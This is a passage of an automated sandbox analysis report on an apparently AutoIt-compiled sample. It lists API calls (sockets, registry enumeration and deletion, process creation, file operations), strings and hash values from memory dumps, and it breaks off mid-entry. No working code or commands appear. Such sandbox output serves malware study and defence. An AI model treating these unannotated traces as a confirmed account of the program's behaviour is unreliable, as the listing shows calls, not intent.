                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 6c8c131458f40f1ad0e55d6e89918fad8a45aa3e1c6f8210c8ef58b9094d4f2a
                                                      • Instruction ID: 2fa030a85877d8270977c47b318bf8bedca26e074644598af500f2a9984d829e
                                                      • Opcode Fuzzy Hash: 6c8c131458f40f1ad0e55d6e89918fad8a45aa3e1c6f8210c8ef58b9094d4f2a
                                                      • Instruction Fuzzy Hash: 4851D7A09447E57DFB3247748C55BFA7EAB5F06300F08488DE2D48A9C2D3A5EC98E750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: d11880602535a4639e1ba3fb12e9cdefef0d9d2bbaf0faba15537c4b4225e852
                                                      • Instruction ID: 59593218cc9795c7d2ef28c707f160273f35c7bca98c9d9e497c27cba07110f7
                                                      • Opcode Fuzzy Hash: d11880602535a4639e1ba3fb12e9cdefef0d9d2bbaf0faba15537c4b4225e852
                                                      • Instruction Fuzzy Hash: 8E41D865C5021876CB55EBF48C469CFB7BE9F04310F50446AE505E3262FB34A345C7EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @U=u
                                                      • API String ID: 0-2594219639
                                                      • Opcode ID: 5d30a7cda751fa60894c2aef857d3edaa780f6ba80480d1af9de814b206b34f2
                                                      • Instruction ID: 9e5dd49b454da2aa2f09095889efeaf601de77479791996fd71d78d5c7de2eb3
                                                      • Opcode Fuzzy Hash: 5d30a7cda751fa60894c2aef857d3edaa780f6ba80480d1af9de814b206b34f2
                                                      • Instruction Fuzzy Hash: B341A135904114AFD720DFA8DC48FE9BBAAEB0A310F150265F916B73E1CB70AD51DE91
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0063D5D4
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0063D60A
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0063D61B
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0063D69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: ,,g$DllGetClassObject
                                                      • API String ID: 753597075-3601260016
                                                      • Opcode ID: 06890224564b6eb20db4ae7299d0da92f529a9105be37ec5ac0945189b7900cb
                                                      • Instruction ID: e7dc050278f6c2d433785fb8241641b330c62cfa414cc4da9a461fc9151ca033
                                                      • Opcode Fuzzy Hash: 06890224564b6eb20db4ae7299d0da92f529a9105be37ec5ac0945189b7900cb
                                                      • Instruction Fuzzy Hash: 1C417BB1600204EFDB05CF64E885A9ABBBAEF46314F1581ADFD099F205D7B1DA44CBE0
                                                      APIs
                                                        • Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00643697,?), ref: 0064468B
                                                        • Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00643697,?), ref: 006446A4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 006436B7
                                                      • _wcscmp.LIBCMT ref: 006436D3
                                                      • MoveFileW.KERNEL32(?,?), ref: 006436EB
                                                      • _wcscat.LIBCMT ref: 00643733
                                                      • SHFileOperationW.SHELL32(?), ref: 0064379F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 18912c21b49f53c9acf61b1596fcb262376633510c4b1921abd5c7aec9f77198
                                                      • Instruction ID: c6c2ba7aca24222d8111271ded038b38a666367d4ae4995b9f3eee5d6cf5edd3
                                                      • Opcode Fuzzy Hash: 18912c21b49f53c9acf61b1596fcb262376633510c4b1921abd5c7aec9f77198
                                                      • Instruction Fuzzy Hash: 1241B171108345AEC795EF60C446ADF77EAAF88380F00082EF099C3391EB34D689C756
                                                      APIs
                                                      • _memset.LIBCMT ref: 006672AA
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00667351
                                                      • IsMenu.USER32(?), ref: 00667369
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006673B1
                                                      • DrawMenuBar.USER32 ref: 006673C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 4cbd03ab80210e98f001a163f68802c8aa7c57f26f4db82c2e08883148fb3b5b
                                                      • Instruction ID: fefdca6381d953f4e13f7ebaf71a60a7607387b7e7b5ea2d4f4b41199130d27c
                                                      • Opcode Fuzzy Hash: 4cbd03ab80210e98f001a163f68802c8aa7c57f26f4db82c2e08883148fb3b5b
                                                      • Instruction Fuzzy Hash: 0E412575A04209EFDB20DF50D884AEABBBAFB09319F149429FD16A7350D730AD50DF60
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00660FD4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00660FFE
                                                      • FreeLibrary.KERNEL32(00000000), ref: 006610B5
                                                        • Part of subcall function 00660FA5: RegCloseKey.ADVAPI32(?), ref: 0066101B
                                                        • Part of subcall function 00660FA5: FreeLibrary.KERNEL32(?), ref: 0066106D
                                                        • Part of subcall function 00660FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00661090
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00661058
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 1eb50130fbda188d4fd5d8fcd96c6376cf0cdf8e3934fbb2018e95080c61bf01
                                                      • Instruction ID: acb6fd79e3d042beba47ccc59a1b023c75750640d1c1eac0c2f0a32d0f502069
                                                      • Opcode Fuzzy Hash: 1eb50130fbda188d4fd5d8fcd96c6376cf0cdf8e3934fbb2018e95080c61bf01
                                                      • Instruction Fuzzy Hash: 88310D71901109BFEF15DF90EC89EFFB7BDEF09340F04016AE901A6251EA759E859AA0
                                                      APIs
                                                        • Part of subcall function 00657D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00657DB6
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006561C6
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 006561D5
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0065620E
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00656217
                                                      • WSAGetLastError.WSOCK32 ref: 00656221
                                                      • closesocket.WSOCK32(00000000), ref: 0065624A
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00656263
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 284cd3c7dc86b233a675d43bab80e041a2f3014e60543b68f46340e08d667e2f
                                                      • Instruction ID: 0a67a036397b4e8470d42f242e47c02bf681f4a63dfa98b291bc89ecbea8a630
                                                      • Opcode Fuzzy Hash: 284cd3c7dc86b233a675d43bab80e041a2f3014e60543b68f46340e08d667e2f
                                                      • Instruction Fuzzy Hash: 52319071600108ABDF10AF24DC89BBA7BAAEB45721F444069FD45A7291CBB0AD08CBA1
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00638F14
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00638F27
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00638F57
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 365058703-2258501812
                                                      • Opcode ID: 932da56cc05e743c3b965bcee2e55d7cc0dd0ed2e5da38eb72b58e98ec9cf6f8
                                                      • Instruction ID: 9a10a70f7d6e81f1a4711437f22a037ff58052122e329411420601b39df07e33
                                                      • Opcode Fuzzy Hash: 932da56cc05e743c3b965bcee2e55d7cc0dd0ed2e5da38eb72b58e98ec9cf6f8
                                                      • Instruction Fuzzy Hash: 56212271A04208BEDB18ABA1DC49DFFBB6AEF45360F04412DF461972E1DB35090AD6A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: 5772038a0de40627efb29a55771470a7d581e8b749d1df9a3359b44f44287a0c
                                                      • Instruction ID: c24b91c59df60b52023bbc79347ef1e3c2a4e1e4774ce32ec2efc78e84661e54
                                                      • Opcode Fuzzy Hash: 5772038a0de40627efb29a55771470a7d581e8b749d1df9a3359b44f44287a0c
                                                      • Instruction Fuzzy Hash: DA210772A4462266D224A734AC13EEB73ABEF56350F10443EF58686291EB919D42C2D9
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0063B204
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0063B221
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0063B259
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0063B27F
                                                      • _wcsstr.LIBCMT ref: 0063B289
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID: @U=u
                                                      • API String ID: 3902887630-2594219639
                                                      • Opcode ID: 8b78597b2f5c8f01ed5236de6a354bb6ef028d2a4c668824c21f78a8ee6e5a38
                                                      • Instruction ID: f38e66dcafdd4b339952efa39e44f823f5893fd7766739b29dd1304cabd5b82a
                                                      • Opcode Fuzzy Hash: 8b78597b2f5c8f01ed5236de6a354bb6ef028d2a4c668824c21f78a8ee6e5a38
                                                      • Instruction Fuzzy Hash: 652137312042007BEB159B75DC09EBF7B9EDF49710F10523DF904DA2A1EFA1DD4196A0
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00639320
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00639352
                                                      • __itow.LIBCMT ref: 0063936A
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00639392
                                                      • __itow.LIBCMT ref: 006393A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID: @U=u
                                                      • API String ID: 2983881199-2594219639
                                                      • Opcode ID: fea4414fa1edefccebf7aec1ae0d80b648396d1cd2490439f7a1d860e726b143
                                                      • Instruction ID: fe3b6ba11a90096d007b574022b33b2647b2d11d18dfdb4c6f1167c66e8e70f2
                                                      • Opcode Fuzzy Hash: fea4414fa1edefccebf7aec1ae0d80b648396d1cd2490439f7a1d860e726b143
                                                      • Instruction Fuzzy Hash: A821D771B04208BBEB109B659C89EEE7BAEEF89710F044029F945DB2D1D6F08D458BF1
                                                      APIs
                                                        • Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
                                                        • Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
                                                        • Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00667632
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066763F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066764A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00667659
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00667665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 23d9ea4ae7ff1ced03c2aa0d157f199c59f77a7c9c788d1703d0c4ac21add499
                                                      • Instruction ID: 00f5ed819455cd699524f0eef9bedebebaee91a48bf0538fcd8beb0892d9826f
                                                      • Opcode Fuzzy Hash: 23d9ea4ae7ff1ced03c2aa0d157f199c59f77a7c9c788d1703d0c4ac21add499
                                                      • Instruction Fuzzy Hash: 9911B2B2110219BFEF159F64CC85EE77F6EEF08798F014114FA05A20A0CA72AC21DBA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 0066B644
                                                      • _memset.LIBCMT ref: 0066B653
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006A6F20,006A6F64), ref: 0066B682
                                                      • CloseHandle.KERNEL32 ref: 0066B694
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID: oj$doj
                                                      • API String ID: 3277943733-1467846714
                                                      • Opcode ID: 6e36e1ef4021142b9f82a721286b4d7f95e88439c7d448d802b59f031a65d2eb
                                                      • Instruction ID: 17266c62d351d4f99e4b53b55970b03fe443523409e0fff12bbc8c5efad4bce6
                                                      • Opcode Fuzzy Hash: 6e36e1ef4021142b9f82a721286b4d7f95e88439c7d448d802b59f031a65d2eb
                                                      • Instruction Fuzzy Hash: CFF05EB2540340BEE7103B61FC0AFBB7A9FEB0A395F045020FA08E51D2E7B15C008BA8
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00603F85), ref: 00604085
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0060408C
                                                      • EncodePointer.KERNEL32(00000000), ref: 00604097
                                                      • DecodePointer.KERNEL32(00603F85), ref: 006040B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 3137ea0daedacc3a616c0db9de983c9c8c0ab5b4d0cadd719b7a42064a705052
                                                      • Instruction ID: bf14583ea6a3e9426a1207011a9b2f6a0383891c30a4a9fc20fc10903a2d7491
                                                      • Opcode Fuzzy Hash: 3137ea0daedacc3a616c0db9de983c9c8c0ab5b4d0cadd719b7a42064a705052
                                                      • Instruction Fuzzy Hash: 38E0BF70681311DFEB20AF61FC1DB567AA7BB06742F206024F111F16A0CFB65A04CE54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: 3fd6988472e4aa1aa35ce34ebe0d23a15edce03bbaf9a95066af34e064a33923
                                                      • Instruction ID: ec7191d6d9468d2418eb43a2ba0b402647da735dc96da86f7f0902370c777ba2
                                                      • Opcode Fuzzy Hash: 3fd6988472e4aa1aa35ce34ebe0d23a15edce03bbaf9a95066af34e064a33923
                                                      • Instruction Fuzzy Hash: 9B61AE3050029AABDF09EF60CC85EFE3BA6BF45308F054529F9956B292DB34DC06CB56
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006602BD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006602FD
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00660320
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00660349
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0066038C
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00660399
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
